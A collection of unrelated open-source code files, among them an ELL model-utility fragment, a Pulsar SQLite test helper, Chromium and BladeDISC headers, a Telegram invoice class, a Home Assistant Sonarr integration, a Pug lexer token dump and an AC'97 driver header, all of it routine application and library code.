throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Unexpected output type for model. Should be double or float.");
break;
};
}
template <typename ElementType, typename DatasetType>
double GetModelAccuracyImpl(const OutputPort<ElementType>& output, const DatasetType& testDataset)
{
auto predictions = GetDatasetInputs(TransformDataInputsWithModel(testDataset, output));
return GetModelAccuracy(testDataset, predictions);
}
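// Copy only the active elements of a padded buffer into a dense vector, dropping the padding
// implied by the memory layout.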
template <typename DataVectorType>
DataVectorType RemovePadding(const DataVectorType& data, const utilities::MemoryLayout& layout)
{
DataVectorType result(layout.NumElements());
int index = 0;
Visit(data, layout, [&result, &index](auto value) {
result[index] = value;
++index;
});
return result;
}
// Explicit instantiation definitions
template UnlabeledDataContainer TransformDataWithModel(const UnlabeledDataContainer& dataset, const OutputPort<float>& output);
template BinaryLabelDataContainer TransformDataInputsWithModel(const BinaryLabelDataContainer& dataset, const OutputPort<float>& output);
template MultiClassDataContainer TransformDataInputsWithModel(const MultiClassDataContainer& dataset, const OutputPort<float>& output);
template VectorLabelDataContainer TransformDataInputsWithModel(const VectorLabelDataContainer& dataset, const OutputPort<float>& output);
template UnlabeledDataContainer TransformDataWithModel(const UnlabeledDataContainer& dataset, const OutputPort<double>& output);
template BinaryLabelDataContainer TransformDataInputsWithModel(const BinaryLabelDataContainer& dataset, const OutputPort<double>& output);
template MultiClassDataContainer TransformDataInputsWithModel(const MultiClassDataContainer& dataset, const OutputPort<double>& output);
template VectorLabelDataContainer TransformDataInputsWithModel(const VectorLabelDataContainer& dataset, const OutputPort<double>& output);
template std::vector<float> RemovePadding(const std::vector<float>& data, const utilities::MemoryLayout& layout);
template std::vector<double> RemovePadding(const std::vector<double>& data, const utilities::MemoryLayout& layout);
} // namespace ell
| 6,024 |
9,156 |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.pulsar.io.jdbc;
import lombok.extern.slf4j.Slf4j;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
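/** Test helper that creates and tears down a temporary SQLite database reachable over JDBC. */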
@Slf4j
public final class SqliteUtils {
static {
try {
Class.forName("org.sqlite.JDBC");
} catch (ClassNotFoundException | NoClassDefFoundError e) {
throw new RuntimeException(e);
}
}
public interface ResultSetReadCallback {
void read(final ResultSet rs) throws SQLException;
}
private final Path dbPath;
private Connection connection;
public Connection getConnection() {
return connection;
}
public SqliteUtils(String testId) {
dbPath = Paths.get(testId + ".db");
}
public String sqliteUri() {
return "jdbc:sqlite:" + dbPath;
}
public void setUp() throws SQLException, IOException {
Files.deleteIfExists(dbPath);
connection = DriverManager.getConnection(sqliteUri());
connection.setAutoCommit(false);
}
public void tearDown() throws SQLException, IOException {
connection.close();
Files.deleteIfExists(dbPath);
}
public void createTable(final String createSql) throws SQLException {
execute(createSql);
}
public void deleteTable(final String table) throws SQLException {
execute("DROP TABLE IF EXISTS " + table);
        // Random errors of the table not being available happen in the unit tests.
try {
Thread.sleep(100);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
public int select(final String query, final ResultSetReadCallback callback) throws SQLException {
int count = 0;
try (Statement stmt = connection.createStatement()) {
try (ResultSet rs = stmt.executeQuery(query)) {
while (rs.next()) {
callback.read(rs);
count++;
}
}
}
return count;
}
public void execute(String sql) throws SQLException {
try (Statement stmt = connection.createStatement()) {
stmt.executeUpdate(sql);
connection.commit();
}
}
}
| 1,213 |
777 |
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef MEDIA_GPU_ANDROID_MEDIA_CODEC_VIDEO_DECODER_H_
#define MEDIA_GPU_ANDROID_MEDIA_CODEC_VIDEO_DECODER_H_
#include "base/threading/thread_checker.h"
#include "media/base/video_decoder.h"
#include "media/gpu/media_gpu_export.h"
namespace media {
// An Android VideoDecoder that delegates to MediaCodec.
class MEDIA_GPU_EXPORT MediaCodecVideoDecoder : public VideoDecoder {
public:
MediaCodecVideoDecoder();
~MediaCodecVideoDecoder() override;
// VideoDecoder implementation:
std::string GetDisplayName() const override;
void Initialize(const VideoDecoderConfig& config,
bool low_delay,
CdmContext* cdm_context,
const InitCB& init_cb,
const OutputCB& output_cb) override;
void Decode(const scoped_refptr<DecoderBuffer>& buffer,
const DecodeCB& decode_cb) override;
void Reset(const base::Closure& closure) override;
bool NeedsBitstreamConversion() const override;
bool CanReadWithoutStalling() const override;
int GetMaxDecodeRequests() const override;
private:
DISALLOW_COPY_AND_ASSIGN(MediaCodecVideoDecoder);
};
} // namespace media
#endif // MEDIA_GPU_ANDROID_MEDIA_CODEC_VIDEO_DECODER_H_
| 510 |
1,283 |
package com.pengrad.telegrambot.model.request;
import java.io.Serializable;
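/** Represents the content of an invoice message; required fields are set in the constructor, optional fields via the fluent setters. */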
public class InputInvoiceMessageContent extends InputMessageContent implements Serializable {
    private static final long serialVersionUID = 0L;
private String title;
private String description;
private String payload;
private String provider_token;
private String currency;
private LabeledPrice[] prices;
private Integer max_tip_amount;
private Integer[] suggested_tip_amount;
private String provider_data;
private String photo_url;
private Integer photo_size;
private Integer photo_width;
private Integer photo_height;
private boolean need_name;
private boolean need_phone_number;
private boolean need_email;
private boolean need_shipping_address;
private boolean send_phone_number_to_provider;
private boolean send_email_to_provider;
private boolean is_flexible;
public InputInvoiceMessageContent(String title, String description, String payload, String providerToken, String currency, LabeledPrice[] prices) {
this.title = title;
this.description = description;
this.payload = payload;
this.provider_token = providerToken;
this.currency = currency;
this.prices = prices;
}
public InputInvoiceMessageContent maxTipAmount(Integer maxTipAmount) {
this.max_tip_amount = maxTipAmount;
return this;
}
public InputInvoiceMessageContent suggestedTipAmount(Integer[] suggestedTipAmount) {
this.suggested_tip_amount = suggestedTipAmount;
return this;
}
public InputInvoiceMessageContent providerData(String providerData) {
this.provider_data = providerData;
return this;
}
public InputInvoiceMessageContent photoUrl(String photoUrl) {
this.photo_url = photoUrl;
return this;
}
public InputInvoiceMessageContent photoSize(Integer photoSize) {
this.photo_size = photoSize;
return this;
}
public InputInvoiceMessageContent photoWidth(Integer photoWidth) {
this.photo_width = photoWidth;
return this;
}
public InputInvoiceMessageContent photoHeight(Integer photoHeight) {
this.photo_height = photoHeight;
return this;
}
public InputInvoiceMessageContent needName(boolean needName) {
this.need_name = needName;
return this;
}
public InputInvoiceMessageContent needPhoneNumber(boolean needPhoneNumber) {
this.need_phone_number = needPhoneNumber;
return this;
}
public InputInvoiceMessageContent needEmail(boolean needEmail) {
this.need_email = needEmail;
return this;
}
public InputInvoiceMessageContent needShippingAddress(boolean needShippingAddress) {
this.need_shipping_address = needShippingAddress;
return this;
}
public InputInvoiceMessageContent sendPhoneNumberToProvider(boolean sendPhoneNumberToProvider) {
this.send_phone_number_to_provider = sendPhoneNumberToProvider;
return this;
}
public InputInvoiceMessageContent sendEmailToProvider(boolean sendEmailToProvider) {
this.send_email_to_provider = sendEmailToProvider;
return this;
}
public InputInvoiceMessageContent isFlexible(boolean isFlexible) {
this.is_flexible = isFlexible;
return this;
}
}
| 1,191 |
328 |
// Copyright 2021 The BladeDISC Authors. All rights reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef TENSORFLOW_COMPILER_MLIR_XLA_RAL_CONTEXT_CONTEXT_UTIL_H_
#define TENSORFLOW_COMPILER_MLIR_XLA_RAL_CONTEXT_CONTEXT_UTIL_H_
#include <algorithm>
#include "tensorflow/compiler/mlir/xla/ral/ral_helper.h"
#include "tensorflow/compiler/mlir/xla/ral/ral_logging.h"
namespace tao {
namespace ral {
template <typename T, int N>
inline void print_memref(tao::ral::MemRefType<T, N> memref,
const std::string& msg) {
auto* pmemref = &memref;
TAO_VLOG(0) << msg << " memref:"
<< "\tbasePtr: " << pmemref->basePtr
<< "\tdata: " << pmemref->data << "\toffset: " << pmemref->offset;
for (int i = 0; i < N; ++i) {
TAO_VLOG(0) << "\tsizes" << i << ": " << pmemref->sizes[i];
}
for (int i = 0; i < N; ++i) {
TAO_VLOG(0) << "\tstrides" << i << ": " << pmemref->strides[i];
}
}
template <typename T>
inline void print_memref_0d(tao::ral::MemRefType<T, 0> memref,
const std::string& msg) {
auto* pmemref = &memref;
TAO_VLOG(0) << msg << " memref:"
<< "\tbasePtr: " << pmemref->basePtr
<< "\tdata: " << pmemref->data << "\toffset: " << pmemref->offset;
}
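// Wraps a raw buffer in a MemRefType, computing contiguous row-major strides from the given shape.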
template <typename T, int N>
tao::ral::MemRefType<T, N> assignMemRef(void* ptr,
const buffer_shape_t& shape) {
tao::ral::MemRefType<T, N> memref;
memref.basePtr = reinterpret_cast<T*>(ptr);
memref.data = reinterpret_cast<T*>(ptr);
memref.offset = 0;
for (int i = 0; i < N; ++i) {
memref.sizes[i] = shape[i];
}
memref.strides[N - 1] = 1;
for (int i = N - 1; i > 0; --i) {
memref.strides[i - 1] = memref.strides[i] * memref.sizes[i];
}
if (TAO_VLOG_IS_ON(1)) {
print_memref(memref, "assigned");
}
return memref;
}
template <typename T>
tao::ral::MemRefType<T, 0> assignMemRef_0d(void* ptr) {
tao::ral::MemRefType<T, 0> memref;
memref.basePtr = reinterpret_cast<T*>(ptr);
memref.data = reinterpret_cast<T*>(ptr);
memref.offset = 0;
if (TAO_VLOG_IS_ON(1)) {
print_memref_0d(memref, "assigned");
}
return memref;
}
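// Returns true if any dimension of the memref is zero.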
template <typename T, int N>
bool isEmptyMemref(tao::ral::MemRefType<T, N> memref) {
return std::any_of(memref.sizes, memref.sizes + N,
[](int64_t dim) { return !dim; });
}
template <typename T>
bool isEmptyMemref(tao::ral::MemRefType<T, 0> memref) {
return false;
}
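// Returns the total number of elements in the memref.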
template <typename T, int N>
int64_t Size(tao::ral::MemRefType<T, N> memref) {
int64_t size = 1;
for (int i = 0; i < N; ++i) {
size *= memref.sizes[i];
}
return size;
}
template <typename T>
int64_t Size(tao::ral::MemRefType<T, 0> memref) {
return 1;
}
} // namespace ral
} // namespace tao
#endif // TENSORFLOW_COMPILER_MLIR_XLA_RAL_CONTEXT_CONTEXT_UTIL_H_
| 1,490 |
3,282 |
<filename>chrome/android/java/src/org/chromium/chrome/browser/preferences/LegalInformationPreferences.java
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.chrome.browser.preferences;
import android.os.Bundle;
import android.preference.PreferenceFragment;
import org.chromium.chrome.R;
/**
* Fragment to display legal information about Chrome.
*/
public class LegalInformationPreferences extends PreferenceFragment {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
addPreferencesFromResource(R.xml.legal_information_preferences);
getActivity().setTitle(R.string.legal_information_title);
}
}
| 248 |
10,031 |
/*
* Copyright (c) 2018. paascloud.net All Rights Reserved.
 * Project: paascloud - rapidly build an enterprise-grade distributed microservice platform
 * Class: MqMessageDto.java
 * Author: 刘兆明
 * Contact: <EMAIL>
 * Source: https://github.com/paascloud
 * Blog: http://blog.paascloud.net
 * Website: http://paascloud.net
*/
package com.paascloud.base.dto;
import lombok.AllArgsConstructor;
import lombok.Data;
import java.io.Serializable;
/**
 * The class Mq message dto.
*
* @author paascloud.<EMAIL>
*/
@Data
@AllArgsConstructor
public class MqMessageDto implements Serializable {
private static final long serialVersionUID = -995670498005087805L;
/**
     * Message key
*/
private String messageKey;
/**
     * Message topic
*/
private String messageTopic;
}
| 347 |
30,023 |
<reponame>MrDelik/core
"""The Sonarr component."""
from __future__ import annotations
from datetime import timedelta
import logging
from aiopyarr import ArrAuthenticationException, ArrException
from aiopyarr.models.host_configuration import PyArrHostConfiguration
from aiopyarr.sonarr_client import SonarrClient
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_API_KEY,
CONF_HOST,
CONF_PORT,
CONF_SSL,
CONF_URL,
CONF_VERIFY_SSL,
Platform,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from .const import (
CONF_BASE_PATH,
CONF_UPCOMING_DAYS,
CONF_WANTED_MAX_ITEMS,
DATA_HOST_CONFIG,
DATA_SONARR,
DATA_SYSTEM_STATUS,
DEFAULT_UPCOMING_DAYS,
DEFAULT_WANTED_MAX_ITEMS,
DOMAIN,
)
PLATFORMS = [Platform.SENSOR]
SCAN_INTERVAL = timedelta(seconds=30)
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Sonarr from a config entry."""
if not entry.options:
options = {
CONF_UPCOMING_DAYS: entry.data.get(
CONF_UPCOMING_DAYS, DEFAULT_UPCOMING_DAYS
),
CONF_WANTED_MAX_ITEMS: entry.data.get(
CONF_WANTED_MAX_ITEMS, DEFAULT_WANTED_MAX_ITEMS
),
}
hass.config_entries.async_update_entry(entry, options=options)
host_configuration = PyArrHostConfiguration(
api_token=entry.data[CONF_API_KEY],
url=entry.data[CONF_URL],
verify_ssl=entry.data[CONF_VERIFY_SSL],
)
sonarr = SonarrClient(
host_configuration=host_configuration,
session=async_get_clientsession(hass),
)
try:
system_status = await sonarr.async_get_system_status()
except ArrAuthenticationException as err:
raise ConfigEntryAuthFailed(
"API Key is no longer valid. Please reauthenticate"
) from err
except ArrException as err:
raise ConfigEntryNotReady from err
entry.async_on_unload(entry.add_update_listener(_async_update_listener))
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][entry.entry_id] = {
DATA_HOST_CONFIG: host_configuration,
DATA_SONARR: sonarr,
DATA_SYSTEM_STATUS: system_status,
}
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
return True
async def async_migrate_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Migrate old entry."""
_LOGGER.debug("Migrating from version %s", entry.version)
if entry.version == 1:
new_proto = "https" if entry.data[CONF_SSL] else "http"
new_host_port = f"{entry.data[CONF_HOST]}:{entry.data[CONF_PORT]}"
new_path = ""
if entry.data[CONF_BASE_PATH].rstrip("/") not in ("", "/", "/api"):
new_path = entry.data[CONF_BASE_PATH].rstrip("/")
data = {
**entry.data,
CONF_URL: f"{new_proto}://{new_host_port}{new_path}",
}
hass.config_entries.async_update_entry(entry, data=data)
entry.version = 2
_LOGGER.info("Migration to version %s successful", entry.version)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
async def _async_update_listener(hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Handle options update."""
await hass.config_entries.async_reload(entry.entry_id)
| 1,627 |
349 |
<reponame>bvn13/skin-composer
package com.ray3k.skincomposer.dialog.scenecomposer.undoables;
import com.ray3k.skincomposer.dialog.scenecomposer.DialogSceneComposer;
import com.ray3k.skincomposer.dialog.scenecomposer.DialogSceneComposerModel;
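/** Undoable action that toggles the "force scroll Y" setting of the selected ScrollPane in the Scene Composer. */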
public class ScrollPaneForceScrollYUndoable implements SceneComposerUndoable {
private DialogSceneComposerModel.SimScrollPane scrollPane;
private DialogSceneComposer dialog;
private boolean forceScrollY;
private boolean previousForceScrollY;
public ScrollPaneForceScrollYUndoable(boolean forceScrollY) {
this.forceScrollY = forceScrollY;
dialog = DialogSceneComposer.dialog;
scrollPane = (DialogSceneComposerModel.SimScrollPane) dialog.simActor;
previousForceScrollY = scrollPane.forceScrollY;
}
@Override
public void undo() {
scrollPane.forceScrollY = previousForceScrollY;
if (dialog.simActor != scrollPane) {
dialog.simActor = scrollPane;
dialog.populateProperties();
dialog.populatePath();
}
dialog.model.updatePreview();
}
@Override
public void redo() {
scrollPane.forceScrollY = forceScrollY;
if (dialog.simActor != scrollPane) {
dialog.simActor = scrollPane;
dialog.populateProperties();
dialog.populatePath();
}
dialog.model.updatePreview();
}
@Override
public String getRedoString() {
return "Redo \"ScrollPane force scroll Y " + forceScrollY + "\"";
}
@Override
public String getUndoString() {
return "Undo \"ScrollPane force scroll Y " + forceScrollY + "\"";
}
}
| 730 |
523 |
{"type":"newline","line":2}
{"type":"mixin","line":2,"val":"article","args":"name"}
{"type":"indent","line":3,"val":2}
{"type":"tag","line":3,"val":"section","selfClosing":false}
{"type":"class","line":3,"val":"article"}
{"type":"indent","line":4,"val":4}
{"type":"tag","line":4,"val":"h1","selfClosing":false}
{"type":"code","line":4,"val":"name","escape":true,"buffer":true}
{"type":"newline","line":5}
{"type":"mixin-block","line":5}
{"type":"outdent","line":7}
{"type":"outdent","line":7}
{"type":"tag","line":7,"val":"html","selfClosing":false}
{"type":"indent","line":8,"val":2}
{"type":"tag","line":8,"val":"body","selfClosing":false}
{"type":"indent","line":9,"val":4}
{"type":"call","line":9,"val":"article","args":"'Foo'"}
{"type":":","line":9}
{"type":"tag","line":9,"val":"p","selfClosing":false}
{"type":"text","line":9,"val":"I'm article foo"}
{"type":"outdent","line":11}
{"type":"outdent","line":11}
{"type":"mixin","line":11,"val":"article","args":"name"}
{"type":"indent","line":12,"val":2}
{"type":"tag","line":12,"val":"section","selfClosing":false}
{"type":"class","line":12,"val":"article"}
{"type":"indent","line":13,"val":4}
{"type":"tag","line":13,"val":"h1","selfClosing":false}
{"type":"code","line":13,"val":"name","escape":true,"buffer":true}
{"type":"newline","line":14}
{"type":"tag","line":14,"val":"p","selfClosing":false}
{"type":"indent","line":15,"val":6}
{"type":"mixin-block","line":15}
{"type":"outdent","line":17}
{"type":"outdent","line":17}
{"type":"outdent","line":17}
{"type":"tag","line":17,"val":"html","selfClosing":false}
{"type":"indent","line":18,"val":2}
{"type":"tag","line":18,"val":"body","selfClosing":false}
{"type":"indent","line":19,"val":4}
{"type":"call","line":19,"val":"article","args":"'Something'"}
{"type":"dot","line":19}
{"type":"start-pipeless-text","line":19}
{"type":"text","line":20,"val":"I'm a much longer"}
{"type":"newline","line":21}
{"type":"text","line":21,"val":"text-only article,"}
{"type":"newline","line":22}
{"type":"text","line":22,"val":"but you can still"}
{"type":"newline","line":23}
{"type":"text","line":23,"val":"inline html tags"}
{"type":"newline","line":24}
{"type":"text","line":24,"val":"in me if you want."}
{"type":"end-pipeless-text","line":24}
{"type":"outdent","line":24}
{"type":"outdent","line":24}
{"type":"eos","line":24}
| 866 |
842 |
<filename>payload-dependencies/src/main/java/io/jenkins/jenkinsfile/runner/payloadDeps/PayloadDependencies.java
package io.jenkins.jenkinsfile.runner.payloadDeps;
import org.kohsuke.accmod.Restricted;
import org.kohsuke.accmod.restrictions.NoExternalUse;
@Restricted(NoExternalUse.class)
public class PayloadDependencies {
// Placeholder class
}
| 125 |
1,338 |
/*
* BeOS Driver for Intel ICH AC'97 Link interface
*
* Copyright (c) 2002, <NAME> <<EMAIL>>
*
* All rights reserved.
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#ifndef _CONFIG_H_
#define _CONFIG_H_
#include "ac97.h"
typedef struct
{
const char *name;
uint32 nambar;
uint32 nabmbar;
uint32 irq;
uint32 type;
uint32 mmbar; // ich4
uint32 mbbar; // ich4
void * log_mmbar; // ich4
void * log_mbbar; // ich4
area_id area_mmbar; // ich4
area_id area_mbbar; // ich4
uint32 codecoffset;
ac97_dev *ac97;
uint32 input_rate;
uint32 output_rate;
} device_config;
extern device_config *config;
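// Detects a supported controller and initializes the global device_config.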
status_t probe_device(void);
#define TYPE_DEFAULT 0x00
#define TYPE_ICH4 0x01
#define TYPE_SIS7012 0x02
/* The SIS7012 chipset has SR and PICB registers swapped when compared to Intel */
#define GET_REG_X_PICB(cfg) (((cfg)->type == TYPE_SIS7012) ? _ICH_REG_X_SR : _ICH_REG_X_PICB)
#define GET_REG_X_SR(cfg) (((cfg)->type == TYPE_SIS7012) ? _ICH_REG_X_PICB : _ICH_REG_X_SR)
/* Each 16 bit sample is counted as 1 in SIS7012 chipsets, 2 in all others */
#define GET_HW_SAMPLE_SIZE(cfg) (((cfg)->type == TYPE_SIS7012) ? 1 : 2)
#endif
| 868 |
545 |
<gh_stars>100-1000
#include <vector>
#include <iostream>
#include <sstream>
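// Returns an iterator to the first element in [begin, end) equal to k, or end if no such element exists.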
std::vector<int>::const_iterator
hasValue(std::vector<int>::const_iterator begin,
std::vector<int>::const_iterator end,
int k) {
for (auto it = begin; it != end; ++it)
if (k == *it)
return it;
return end;
}
int main() {
std::string str;
std::getline(std::cin, str);
std::istringstream iss(str);
std::vector<int> vi;
int k;
while (iss >> k)
vi.push_back(k);
std::cin >> k;
auto it = hasValue(vi.cbegin(), vi.cend(), k);
    if (it == vi.cend())
        std::cout << "Did not find " << k << " in range" << std::endl;
else
std::cout << "Found " << *it
<< " at position " << it - vi.cbegin() << std::endl;
return 0;
}
| 338 |
14,425 |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.fs.obs;
import static org.apache.hadoop.fs.obs.OBSConstants.SSE_KEY;
import static org.apache.hadoop.fs.obs.OBSConstants.SSE_TYPE;
import com.obs.services.model.SseCHeader;
import com.obs.services.model.SseKmsHeader;
import org.apache.hadoop.conf.Configuration;
/**
* Wrapper for Server-Side Encryption (SSE).
*/
class SseWrapper {
/**
* SSE-KMS: Server-Side Encryption with Key Management Service.
*/
private static final String SSE_KMS = "sse-kms";
/**
* SSE-C: Server-Side Encryption with Customer-Provided Encryption Keys.
*/
private static final String SSE_C = "sse-c";
/**
* SSE-C header.
*/
private SseCHeader sseCHeader;
/**
* SSE-KMS header.
*/
private SseKmsHeader sseKmsHeader;
@SuppressWarnings("deprecation")
SseWrapper(final Configuration conf) {
String sseType = conf.getTrimmed(SSE_TYPE);
if (null != sseType) {
String sseKey = conf.getTrimmed(SSE_KEY);
if (sseType.equalsIgnoreCase(SSE_C) && null != sseKey) {
sseCHeader = new SseCHeader();
sseCHeader.setSseCKeyBase64(sseKey);
sseCHeader.setAlgorithm(
com.obs.services.model.ServerAlgorithm.AES256);
} else if (sseType.equalsIgnoreCase(SSE_KMS)) {
sseKmsHeader = new SseKmsHeader();
sseKmsHeader.setEncryption(
com.obs.services.model.ServerEncryption.OBS_KMS);
sseKmsHeader.setKmsKeyId(sseKey);
}
}
}
boolean isSseCEnable() {
return sseCHeader != null;
}
boolean isSseKmsEnable() {
return sseKmsHeader != null;
}
SseCHeader getSseCHeader() {
return sseCHeader;
}
SseKmsHeader getSseKmsHeader() {
return sseKmsHeader;
}
}
| 945 |
421 |
#using <System.Xml.dll>
using namespace System;
using namespace System::IO;
using namespace System::Xml;
using namespace System::Xml::Schema;
using namespace System::Xml::Serialization;
// <Snippet1>
public ref class Vehicle
{
public:
[XmlAttributeAttribute(Form=XmlSchemaForm::Qualified)]
String^ Maker;
[XmlAttributeAttribute(Form=XmlSchemaForm::Unqualified)]
String^ ModelID;
};
// </Snippet1>
| 166 |
1,091 |
/*
* Copyright 2017-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.mapping.codec;
import com.fasterxml.jackson.databind.JsonNode;
import org.hamcrest.Description;
import org.hamcrest.TypeSafeDiagnosingMatcher;
import org.onosproject.mapping.actions.MappingAction;
import org.onosproject.mapping.actions.NoMappingAction;
import org.onosproject.mapping.actions.DropMappingAction;
import org.onosproject.mapping.actions.ForwardMappingAction;
import org.onosproject.mapping.actions.NativeForwardMappingAction;
/**
* Hamcrest matcher for mapping actions.
*/
public final class MappingActionJsonMatcher
extends TypeSafeDiagnosingMatcher<JsonNode> {
private final MappingAction action;
/**
* A default constructor.
*
* @param action mapping action
*/
private MappingActionJsonMatcher(MappingAction action) {
this.action = action;
}
/**
* Matches the contents of a no mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if contents match, false otherwise
*/
private boolean matchNoAction(JsonNode node, Description description) {
NoMappingAction actionToMatch = (NoMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
/**
* Matches the contents of a drop mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if the contents match, false otherwise
*/
private boolean matchDropAction(JsonNode node, Description description) {
DropMappingAction actionToMatch = (DropMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
/**
* Matches the contents of a forward mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if the contents match, false otherwise
*/
private boolean matchForwardAction(JsonNode node, Description description) {
ForwardMappingAction actionToMatch = (ForwardMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
/**
* Matches the contents of a native forward mapping action.
*
* @param node JSON action to match
* @param description object used for recording errors
* @return true if the contents match, false otherwise
*/
private boolean matchNativeForwardAction(JsonNode node, Description description) {
NativeForwardMappingAction actionToMatch = (NativeForwardMappingAction) action;
final String jsonType = node.get(MappingActionCodec.TYPE).textValue();
if (!actionToMatch.type().name().equals(jsonType)) {
description.appendText("type was " + jsonType);
return false;
}
return true;
}
@Override
protected boolean matchesSafely(JsonNode jsonNode, Description description) {
// check type
final JsonNode jsonTypeNode = jsonNode.get(MappingActionCodec.TYPE);
final String jsonType = jsonTypeNode.textValue();
final String type = action.type().name();
if (!jsonType.equals(type)) {
description.appendText("type was " + type);
return false;
}
if (action instanceof NoMappingAction) {
return matchNoAction(jsonNode, description);
} else if (action instanceof DropMappingAction) {
return matchDropAction(jsonNode, description);
} else if (action instanceof ForwardMappingAction) {
return matchForwardAction(jsonNode, description);
} else if (action instanceof NativeForwardMappingAction) {
return matchNativeForwardAction(jsonNode, description);
}
return false;
}
@Override
public void describeTo(Description description) {
description.appendText(action.toString());
}
/**
* Factory to allocate a mapping action matcher.
*
* @param action action object we are looking for
* @return matcher
*/
public static MappingActionJsonMatcher matchesAction(MappingAction action) {
return new MappingActionJsonMatcher(action);
}
}
| 1,931 |
1,652 |
package com.ctrip.xpipe.redis.core.proxy.exception;
import com.ctrip.xpipe.exception.XpipeRuntimeException;
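/** Thrown when a proxy protocol message cannot be parsed. */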
public class ProxyProtocolParseException extends XpipeRuntimeException {
public ProxyProtocolParseException(String message) {
super(message);
}
}
| 90 |
575 |
<filename>third_party/blink/renderer/bindings/tests/results/core/v8_test_interface_constructor_4.cc
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file has been auto-generated from the Jinja2 template
